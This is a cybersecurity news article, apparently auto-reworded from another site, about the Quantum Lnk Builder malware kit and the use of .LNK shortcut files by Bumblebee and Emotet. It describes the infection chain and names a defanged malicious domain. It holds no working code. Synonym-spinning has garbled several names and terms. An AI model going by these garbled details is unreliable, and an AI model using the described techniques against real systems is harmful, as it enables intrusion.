• Menu
  • Skip to main content
  • Skip to primary sidebar

The Cyber Security News

Latest Cyber Security News

Header Right

  • Latest News
  • Vulnerabilities
  • Cloud Services
new 'quantum' builder lets attackers easily create malicious windows shortcuts

New ‘Quantum’ Builder Lets Attackers Easily Create Malicious Windows Shortcuts

You are here: Home / General Cyber Security News / New ‘Quantum’ Builder Lets Attackers Easily Create Malicious Windows Shortcuts
June 24, 2022

A new malware software that allows cybercriminal actors to establish malicious Windows shortcut (.LNK) files has been noticed for sale on cybercrime boards.

Dubbed Quantum Lnk Builder, the software program tends to make it doable to spoof any extension and choose from more than 300 icons, not to point out assist UAC and Windows SmartScreen bypass as nicely as “numerous payloads per .LNK” file. Also available are abilities to create .HTA and disk impression (.ISO) payloads.

Quantum Builder is readily available for lease at different selling price points: €189 a month, €355 for two months, €899 for 6 months, or as a one-off life span purchase for €1,500.

✔ Approved Seller From Our Partners
Mullvad VPN Discount

Protect your privacy by Mullvad VPN. Mullvad VPN is one of the famous brands in the security and privacy world. With Mullvad VPN you will not even be asked for your email address. No log policy, no data from you will be saved. Get your license key now from the official distributor of Mullvad with discount: SerialCart® (Limited Offer).

➤ Get Mullvad VPN with 12% Discount


“.LNK documents are shortcut data files that reference other information, folders, or programs to open up them,” Cyble scientists stated in a report. “The [threat actor] leverages the .LNK documents and drops destructive payloads working with LOLBins [living-off-the-land binaries].”

Early evidence of malware samples employing Quantum Builder in the wild is said to date back to May perhaps 24, masquerading as harmless-seeking text documents (“exam.txt.lnk”).

“By default, Windows hides the .LNK extension, so if a file is named as file_name.txt.lnk, then only file_name.txt will be obvious to the consumer even if the show file extension solution is enabled,” the researchers said. “For this kind of reasons, this could be an interesting option for TAs, utilizing the .LNK information as a disguise or smokescreen.”

Launching the .LNK file executes PowerShell code that, in switch, runs a HTML application (“bdg.hta”) file hosted on Quantum’s web site (“quantum-software program[.]on line”) employing MSHTA, a legitimate Windows utility that’s utilized to operate HTA files.

Quantum Builder is stated to share ties with the North Korean-centered Lazarus Group primarily based on source code-level overlaps in the software and the latter’s modus operandi of leveraging .LNK files for delivering more phase payloads, indicating its prospective use by APT actors in their attacks.

CyberSecurity

The growth arrives as operators guiding Bumblebee and Emotet are shifting to .LNK information as a conduit to trigger the an infection chains following Microsoft’s conclusion to disable Visual Essential for Programs (VBA) macros by default across its products and solutions before this 12 months.

Bumblebee, a replacement for BazarLoader malware 1st noticed in March, features as a backdoor made to give the attackers persistent obtain to compromised systems and a downloader for other malware, which include Cobalt Strike and Sliver.

The malware’s abilities have also manufactured it a tool of choice for menace actors, with 413 incidents of Bumblebee an infection documented in May well 2022, up from 41 in April, in accordance to Cyble.

“Bumblebee is a new and extremely advanced malware loader that employs considerable evasive maneuvers and anti-examination methods, which includes complicated anti-virtualization approaches,” the researchers said. “It is very likely to come to be a well known instrument for ransomware groups to provide their payload.”

Identified this report intriguing? Adhere to THN on Fb, Twitter  and LinkedIn to browse more distinctive material we post.


Some elements of this posting are sourced from:
thehackernews.com

Previous Post: «log4shell still being exploited to hack vmware servers to exfiltrate Log4Shell Still Being Exploited to Hack VMWare Servers to Exfiltrate Sensitive Data
Next Post: State-Backed Hackers Using Ransomware as a Decoy for Cyber Espionage Attacks state backed hackers using ransomware as a decoy for cyber espionage»

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Report This Article

Recent Posts

  • Malicious Python Package Uses Unicode Trickery to Evade Detection and Steal Data
  • Some GitHub users must take action after RSA SSH host key exposed
  • THN Webinar: Inside the High Risk of 3rd-Party SaaS Apps
  • Pension Protection Fund confirms employee data exposed in GoAnywhere breach
  • GitHub Swiftly Replaces Exposed RSA SSH Key to Protect Git Operations
  • Now UK Parliament Bans TikTok from its Network and Devices
  • IRS Phishing Emails Used to Distribute Emotet
  • Researchers Uncover Chinese Nation State Hackers’ Deceptive Attack Strategies
  • Fifth of Execs Admit Security Flaws Cost Them New Biz
  • Online Safety Bill: Why is Ofcom being thrown under the bus?

Copyright © TheCyberSecurity.News, All Rights Reserved.